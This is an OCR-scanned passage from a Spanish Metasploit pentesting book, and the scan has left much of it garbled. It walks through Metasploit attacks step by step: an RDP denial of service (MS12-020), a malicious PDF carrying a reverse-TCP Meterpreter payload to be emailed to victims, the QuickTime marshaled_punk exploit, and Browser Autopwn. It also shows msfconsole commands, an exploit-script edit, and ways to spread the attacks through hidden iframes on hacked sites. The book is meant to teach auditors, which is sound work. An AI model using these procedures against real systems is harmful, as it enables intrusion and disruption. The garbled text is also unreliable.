en numeroeos eaveneive posi Los paylaod de tipo single, también conocidos como inline, son aulénomos y realizan una trea coneretao specifica, Por ejemplo, bind una shel, reacién de un usuario en el sistema, ejecucion ‘deur comando, tetera. Los payload de tipo siogers se encarpan de crear la conexin entre el cliente y la vietina, y _generalmente, son wilizados para descarga payloads de tipo staged, Los payload de tipo stage se descaran y son ejeculados por los de tia stagers y normalmente Son uilizados para realizar tareas complejas o con gran variedad de funcionalidades, como puede set, un meterpreter, En otras palabras los de tipo staged ullizan pequefios stagers pura gjusarse en pequefios espacios de memoria dénde realizar la explotacin, La eantidad de memoria que se Aispone para realizar la explotacién en la mayora de los casos, est imitada. Los stagers se eolocan ‘en este espacio y realizan la faneiSn necesaria para realizar la conexi6n con el resto del payload, de lipo staged. ‘Todos los exploits en Metasploit uilizan exploivinui/hanaler. Este médulo es eapaz de gestionae YY manejar cada uno de los exploits que se eneventraa en el framework, sn impact la conexin © ol tipo de arquitectura, Este médulo estédiseNado de tal forma que sabe como tratar cada tipo de Capitulo I El arte deta intrusién ia payload porque cu su configuraviOn se le doe que debe espernr Cuando el auditor se ecuenta ‘on un médulo cargado, previo uso del eomando we, llega in momento en el que we debe eleie el ad, co a instaccién set PAYLOAD ind arpetreere ‘ Dose mT Tt Fig3.0: Cae dl epi y olga del ma Una vez cargado el mbdulo, si se ejecuta show opvions se mnuestran las variables para configurar el exploit En este ejemplo, se configura la variable RHOST para indiar cuales la miquina objetivo, ‘Ademts, se debe indict en la variable PAYLOAD cual de ells se quiere ejecular. Una vez indicade , el payfoad si se vuelve a ejeeutar el comando show options se puede observar como aparecen, ademas de las variables de configuracién de exploit, las variables de configuracién del payload. ice cet Sig ened Serio 0 ims eer Fi: Cg et ppl canine Es muy interesante entender distints conceptas en el comportamieto de os payload en funcidn ei son inversos, reverse, o directs, bind. En la prueba de eonceplo se ha ullzado un payload ‘eterpeter de conexién inversa, por lo que se debe configuraralcéigo del payload dénde se debeMetasploit para Pentesters cconectar mediante fa variable LHOST, es decir, a direccia IP del alacanteo de un servidor que ‘eco fs conexiones que se encuentre bajo el contol del stacunte Por oto Indo, se pod haber wilzado un payload eon conexin directa, bind. En ese caso, en vee de apatecer la variable LHOST en la configuracin del payload, apareceta la variable RHOST, ‘que debe seria dieccidn 1P de ka maquina a la que se quiere veceder. Hay que recor que en ut payload de conexion directa, es ef autor quién se conecta a ki vitima, Tras el lanzamiento del exploit, se dea en un puerto a la escacha, por ejemplo, una shel, y es entonces el auditor quign se ‘eonect.a ese puerto dinde espera la shell remot, i305: Dell ea coe dos pea El comando check petmite verificar si el equipo remolo es vulnerable al médulo cargado, por esto, antes Ue lanza el exploit se puede uilizar est comando para veriica la vulnerabilidad, Una vez veificada se lanza el comando exploit, y se obtiene la sesia remota, en est caso de meterpreter. Shilo mt» et Fig 306 Bxploocia de mii Wado XP SPD apa PoC: Denegacién de servicio y las pérdidas exa prueba de conepto no se reali un proceso de inusin, per ie comproba I sogrdad de los servicios de los que pede eisponer una empresa, cayas cals pueden provocr pias & és, y sade forma pivadaopliea,Enesteemplo sila a vulneslided §S1220 lagu se puede obtener mayor infomacin ena siguiente URL: hupsechet mires com/es-es/ Capitulo IH Bl arte de fa intrusion re securitybulletin’ns 2-020, La miquina objetivo en el siguiente eacenatio seri un Windows 7 con ‘PI de 64 bts. También son posbles targets ls siguientes versiones els sistemas operatives XP, 2003, 2008 62008 R2. En primer lugar, la vietima debe disponer de una configuracion cone eta desu servicio de esertorio remoto, Como se puede visualizar en ls imagen existen 3 opciones en Windows 7, igicamente, sino se permilen conexiones nose pod ealizat la denegacin de servicio, y por ot fado, si seco lata «que slo se permitan las conexiones desde equipos que ejecuten esertrio remolo con sutentcacion 1 nivel dered tampoco. Por lo que sila vietima dispone de la configuracin permitir conexiones aque eecuten cuslauier versin de eseitori remoto, puede ser vulnecable si wo ha aetuaizada eon lw coneccion de ts vulnerbilidad, Nepiontetny gation sn tap tacrmennscane OCuanecnacSocomec pected Strstcthaucnressntnaas otra) ig: Conigaracin oro eat en Winks 7 Para ablener el médulo se puede descargar ditectamente en la siguiente web winrmerasploit combnodles(wiliaryldoshvindows/rdp/ms!2_020_maxchannelidsteniendo en eventa que ¢s ib iédlo de tipo auitiary. Mace te tnt tse Sieudnnna ry stots i iat iH > rasan ac it tes (aan ys scat) omer eng maga icon 1 hm - mat ey es Fig: Dengan servicio del eitrawenolo de wn iin Wd 7.a Metapoi parn Pentex Una vez se dispone del médato en el jramework se secede a él y se configura, de manera secila, equipo remota al que se quiere denegar el se-vcio, Si todo va bien, se obtendra un mensaje que enuncia seems down. Sila mfquina a auditardispusiera de un servicio de escritario remote en otro poerto que no seael de por defect, se puede ulizarl variable RPORT para inicar cual esl puerto ‘que se est utiliza, Parece que todo ha funcionado correctamente y que la méguina ha eaido, En funcién de la ‘onfiguraeién de la eiguina ésta se reiniciaré tras realizar un volcado de memorie, g¥ si tas a levantarse fe vuelve a realizar una denegacion de servicio? ,Y si la maquina no esta configotada para reinciase y queda Tera de servicio hasta su inicio manual? Estas pregunin so bastante lige, y areal es que sla maquina es vulnerable Ia empres ene un gran prblenss, i cual deberia ser solucionado con la aplieacibn del parche para evita este agujero Fig: Pals sel de Winds 7s degli de vv, 4, Intrusion con interacei6n Cen side atack 0 ataques del lado del clione, son atagues que permiten al atacante tome el na victima expfotando una vulnerbildad de una aplcacién que es ejecutada cuenles, cada ver son mis complojs y provacan que por el usuario, Este tip de alaques son nw ia vietima no sepa realmente lo que esté haciendo con su miquina ‘éenica consste en crear, ya sea un fichero, un servicio, © una aplicacién, confines mi con el objetivo de obtener acceso la méquina de Ia victima, ya sea por red local o por Intemet. Capitulo IL Bl arte de ta intrusién ‘eraplt ayuda meta eee ind sagesy ene parade dos eld hora de pensar enn alague de este tipo ‘A continuacién se proponer dstintos escenarios y pruebas de conseplo con los que el tector ei similar la tcnieay los coneeptos de manera sencilla y répida 4 PoC: Los archivos adjuntos pueden ser muy peligrosos 4 nea pre de concept sella la posibildad de crear acs rics eon el fn de gu ts vctimas fo eecuten mediante c uso de una apicacién vuneable. En la pra se olin um ‘ulnersbildad de fa famosa herranenta Adobe Reader la cuales vulnerable en ss versiones 8 9.x de product, 4 En este ejemplo se ha decidido explotar esta vulnerailided debide a que afecta los archivos POPE !muylizados en ntemet, ya un de is heranients que disponen la mayor de os usaros pa visvalizar este tipo de archivos. Existen ofr vulneabilidades de et tipo, comiinmente conocidaa ‘como FileFormat, en el que se pueden exear documentos ofimitices de aplicaciones muy utiizadad ome Word oxce,o archivos de ists de repos de Times, cays ines Son malcioss. 4 ‘Una de las vas de istriouein de este atague sera, por ejemplo enelcontexto de una gran empresed ef correo eletrénica. Mediante ia tilizacién de un servidor de ccreo electrnio se podria hacey liegar este tipo de archivos a toda una onganizacién y con lie probebildad habria usuarios que éjecutarian estos archivos. Otra de ls vas, seria colgar ests archives en foros, blogs, sitios web bupel conto del acne, Como sempre, do depended a inagnacin del teat de lncalidad de sn ingenievin soit ' El escenario que se propone en esta prueba de concepto es que un atacante prepare un documenta PDF en el cual se inyecta un payload de tipo Meterprete. Este aichivo alilizara una plait, cs. decir, un documento PDF real que sere que se visuaizaré cuando la victima lo ejecute. Adem cuando la vitima lo ejeeue 8 su eplcacin Adobe Reader es vulnerable se ejecutari ol payload. El fcante realizar ia dstribucién mediante et uso del correo electrnica, como archivo advunin, El! atacante deberd carpet melo exploitimlifhander para recog ls dstinasconexiones que oblengan por las expttacionesrealizadas con éxito mediante el archivo PDF malicioso, El exploit se encuentra alojado en exploizhvindowsfteformatladobe_pd- embedded eve en ta ruta relativa a msfeonsole. Si se miran ls fargets, se encuenta que silo funciona para Bindows XP S5P3 versién ingles, Sie abeivo son vieinas on sistemas opertvas en otro idioms, el alae po defect no funciona, Exste una fi solucin y es modifica el crit en Ruby y aad fo necesario para que el expt funcione en sistemas operative con ia versiGn espafola, EI exploit se eneverira en la ruta. /peneatlexplltsramewerk3fmodlesfesplotshvindows! ileformatiadobe_ pf embedded eve rs 6 optlaptineiaspoitineptimaduleslexplous /windows? ‘ileformatiadobe_pdf embedded _exerb. Pare modiicar el exploit + que funcione en Windows XP ‘SP3 en espaol se debe localizarl siguiente linea ee ciigo= etl pora Paneer es = ( "Desktop", "My documents", “Socuments ‘Simplemente se deben aad los siguienles nombres a la anterior linea ddiza = | "Desktop", “My Documents", “Documents”, “Bacriterio’, “Mie Documentos”, “oocumentos™ | i vez modificado el sero’ se debe arrancar myfconsole y se pad ullzar el nuevo médulo ‘dficado, nla sigviente tabla se pueden visulizar algunos parmeteos iteresanes &configurar leas la carga del médulo adobe_ pdf embedded exe. Pardmetro Valor [Nombre de jecutable del payload, sino se indica se aulogenera uno. ‘Se indica ef nombre que recibcl el PDF malicioso, Se indica ls ruta donde se encuentra el PDF real que se ullaaré pars ‘mostrar a viet “Mensaje que visualizaré fe vietna, el cual si gjecuta se realizar ta LAUNCH MESSAGE | sh opine fre epics testes, ietenat uke iene oo, TO ie of pad ae frre etgar mers jrstaetep eta gt Lat esse ver te eer etn ear teh the Bot show tl 7 Fig3.10 Coogan pt a creacin del POF nals ‘Ades, hay que contigurar el parimetro PAYLOAD, en este ejemplo se ha utilizado set PAYLOAD windows/neterpreterdreverse_tcp.Indicando a qué IPs Lene que eonectar el payload. Una vee configurado se ejecuta el comando exploit y se genera el fichero PDF malicioso. Se puede empezar In distibucién mediante el corre electrinico, pero a Ja vez se debe estar preparado para recibir ls conexiones osesionesremotas. Pru ello se carga en mafconsole el dul exploit’ ‘handler. Bste manejador sive para que cuando la vietima ejecute el archivo y el payload realice |i concn inversa al tacante, ese médulo gestionaré este proceso dando acceso al alacant a a sméquing remota, Capitulo I Et arte de ta imran ew Este médulo se configura de manera seneills, simplemente se debe indicat que tipo de payload se ‘espera y cuales la direcciéa IP local, es decir, ala que el payload se va a conecer Fisk oto iondtery > aed Pini winionrasterpretr/ revere ta] fnv.ca <> nantous/acterpreter/reverse to fst epiottoaniter) > set List 1s2-168.<2 ig: Coie del manor de Hep ina vee que las posibles vctimas han abierto el comeo, han ejeculad el archive PDF y dispnnen de ‘wa versin de la aplicacién vulnerable se muestra un warning al usutio, s porello que el mensaje «que se introduzea en el parimetro LAUNCH_MESSAGE es imporante que sea celle, un aque de ingeniesia socal Ft usuario pula sobre open y se estar ejocutando el payload en la miéqulne de |e ction, Con Giza] igh I jeu dl PF por pre dein, Lacrplotacién devuetve una consola de Meterprelery el usuario o victima puede seguir visualizando 1 PDR, el cual muestra el contenido de fa plantlla utiliza para exer el POF malicioso, sk eipaitihadter) > explo I) started reverse nandler en 382.168 ist starting the poylead tendler f Siete > 192.168.0.61: 2321) at 2012-06-27 02.0921 Jctecoreter > tackground fst eptnt(handter) > sessions 1 nforaton connection seterpretersuayven2 isn i319: Obcorin de ssn ner de Meet. QuickTime y sus conexiones por Rubén Santamarta A Finaes del ao 2010, sai una de las vineabildads més inprates ens mos i lo que sire a Apple y sus productos. Rubén Saamana, ivestigador expl desa CL Y my conocido como reversemode, sacs a la luz pblica esta vulnerabilidad y sv correspondiente exploit el esl permitia aun atacane eecutar céigoarbitravi en las versiones XP de Windows con SPS. Esa vulnerailided se encontraba escondide en QuickTime Player y levaba 9 aos abi, La vulnerbitidad se debe & un parimetro denominado _Marshaled pUnk en el visor de QuickTime ‘we se utiza parm cargar elements desde la ventana Segin comentaba Rulbén Seniamarts, cuando Dublice su exploiten el articulo p:livwnreversemede.comindexphp?option=com.content&ask viewibidl=694t lei =), parece que alguien se olvidé de limpiar esta luncionalidad i cia despuds de que Rubén lberase este Olay que afetaba a fas stimas versiones de QuickTime, Por aque entonces ia 7.6.6 ln 7.6.7, ls desarrolladares de Metasploit liber Jramework ron un mélo para el Ft escenario de In prucha de concepto es el siguiente: existe un atacante, con una distribucidn BackTrack que quedari al espera de que is vietmas, que ejecaten una versin de QuickTine 7.0.2 «inferior, se conecten aun recurso propuesto por el alacante. ;Cémo se logra que las victims se jconecten a fs maquina dl alacant? Esta pregunta tiene muchas respuesta, y normalmentcse puede ‘contest con la palabra imaginacién. No existe un método inca, y siempre cada metodo puede Ser ejeutado con toques inteesantes de creatividad ¢ imaginacidn, Por ejemplo, el atacante puede haber distribuido une gran cantidad de links por fors, blogs, rees sociales, correo electrénicos, etter que reiijan a una vctima ala drecci6n IP y al recurso malicoso de atacante En muchas ‘easiones, Ia vilima no sera vulnerable al exploit, ya sea porque no clspone de est aplicacion, 0 Porque la apicacin est parcheada, Otro método interesante es intrceptar ef trfico de las victimes, encontrndose en la red local del aac yredirigina facia el recurso malicioso. Quizé uno de los métodos mis interesanes,y qe % muy ufiizado en el mundo real para distribuir malware, es disponer de una serie de paginas hnackeadas a las que se eoloca un iframe transparente que apunta hacia el recurso malicioso, En este caso cuando fa vctima entra a I pgina web rel, su navegndor carge el frame, el cual apunta ‘nec el recurso malicioso y se puede leva a cabo la explotcién, sin mas interaceién por parte de fa vietima que el simple acceso a un sitio web. teeter JF) Seren ener soos tor pattern erste. ininerhracerapte quiet matted pk ining ot” grat sole tlaae 1.4 Fig: Cag del lo mare jak psa Aple Qvc ine Ta ‘has buscar marshaled en el framework: se carga el médulo y se prepara el entorno para que cuando of elinterealice la peticion y ejecute la aplicacién vulnerable, cen side attack, e exploit realice e tuabajoy devuelva el control de la méquina remota, Capitulo I El arte de fa intrusién a 1 pepe etetine Mayer 7.6.85 sl 7.6.7 on Weds F579 toes un snap) » set SEES 2.82 heist et est irtn vetting wade)» aot thm ses [i esos eltton sarap > set PL w ‘La coafiguracién es sencilla, se deben asignar valores alas variables 0 los pardmettos siguienes:! Parimetrn Z SRVHOST | tx direccibn IP donde se implementa ef reaurs0 malicioso 0 explo | Se debe indica el puerto que quedaréa la escul, para simular un recurso ame ‘web es importante aignaro en el 80 Recurso al que se quiere acceder. En ef eemplo se inca Guegos, pero P bastaria con / URIPATHL [PAYLOAD Se debe indicar el payload a ejecuar en la miquina voinerable Tia 302: Corte dl mao mars pak Is iyo hasan onan ces 2) non le ee 18.7 rtd snk ‘sei stage Dassen a nett) st terete esse tere (0 GRA > 2.8.6.8: Penn 1 x jsut > a8 oes Utter 1 Be sere proceed 436) Fig 16: Epc ler com el mc mre uk.Metasploit para Pentesters ‘Pueden llegar peticiones de muchas victimes, en funcién del método de distribucion que set tsiad, cule mis pains legen myer pombe Sas ens eo ae ued ley qe cans dese ese ruleabiied fsibiata po eae ns ra Oy or oie oe cals Ge paces le La Ieper every ented pos que dips sprees no atladaay os aoa ny ‘on pies alae ds ids Oa Dark Shadows, el mundo oscuro y real Laindsia del matey lade online sige siendo dl dehy, granola de esa ind, Un indcaor de ete eho es el nimeo de copa nies de malware que te ha pemte oy g ilo aos, Ea pines lg hay qu ecorar que el spam, en eget ol hmevinn pon sien fe via de distin leg, que el malware sigue erecende qc ls Moe O8 % sete 2 auge y que fs disposivs mévies von un objetivo ya atcado,Adeiniy, ep fort imporantes se han dscubiero vuherabiliades cies y el nim de agueros de epeicad «escubieros pr alo sigue siendo um nero muy ato. Sion nite ene OTN ie occ tem shane 28K om ig. Kitdeexpitn Blk Hole Capitulo Hl. Bt are de la inrasin Una de las vias ms importantes para a distribucién de matware sot los sitios web, utlzando un kit de explotacin, como puede ser Black Hole, Eleanore o Phoenix Exploit. Esto kit de expltacisn Aisponen de gran cantidad de exploits pablicosy, si se page lo suficieleen el mercado umelrgrnl de explotsprivados. Dichos exploits privados proporcionaa al slacate una venta sobre muchos de os usuarios que caecin en sus redes con fines maliciosos, isponen de paneles que aportanfecilidad de uso y gran informscién. Muchos de ellos taje de éxito, ‘Ademas ltecenestadisticas de los navegadores explotados, ls pues dels vietmnas, po exploits que mis aierto han tendo, el sistema aperaivo mis explosado, eleétern. El proceso noes trivial pero una vexestuiad no es de gran compljidul. La ides e que el atacane selecciona las vctimas a través de un programa automético que bisa patrones en los buscadores como Google o Bing. Una vez se obtene la lista de sitios que son vulnerables, e realzan ataques SQL Injection a todos ellos, cuyasinyecciones est preparadas para introduc ego malicisy en la pigina web, 1 céigo malicioso que se introduce carga el contenido de ne direecibn que ser dénde se encuentre el ki de explotcién, De este modo, cuando un vsitante navegue por el sitio web vulnerado sera alacado con un exploit que tratark de ejecutar un maiware en su maquina, ‘Como ejemplo de un hecho real se muestra #continuaci6n uno de los vaioswtaquessufridos por fa ‘web de Apple. Tambin hey que decir que Apple ha trabajado siempre de manera rpida para Kinpiar toda referencia sitios web maliciosos. Bn la imagen se puede visualizar como se inyeets un ume ‘que reerenciabaal sitio web malicioso ene interior del sitio web de Apple. Bl sii al que se releian cra al dominio nemohuildin.ru, pro a victima podria no detect ninguna accién extra ya que si frame fuese wanspareate no se visualzaria nada extra, Sraota aera catnSonrsco veel ieaeatoensesctnecntecnmmeerane ig. Bunda de aoe ales qu abaya are PoC: La técnica Browser Autopwn En la siguiente prueba de conceto se utilizar el médlo Brower ame osibldad de fanz eps de acuerdo ala version dl navegador quel vicina ex ula [Elescenatio dispone de 2 maquinas, una serkel alacante con un equipo Windows XP-SP3 quedlispone «de un servidor WAMP el eval ofrecer una pégina web maliciosa,simulandon sito hackeado, pigina web dispondet de un frame transparent que referencia a una maquins donde se encuetie el ‘médulo browser_autopynesperando par lanza los exploits. Bn el escenario el malo se encontrar en un Merasploit en la misma miquina del WAMP, es decir, en la miquina del atacanle. Por olr0 lado, se dispoue de una miquina que ser lade la victim, coriendo un Windows XP SP3, en Ia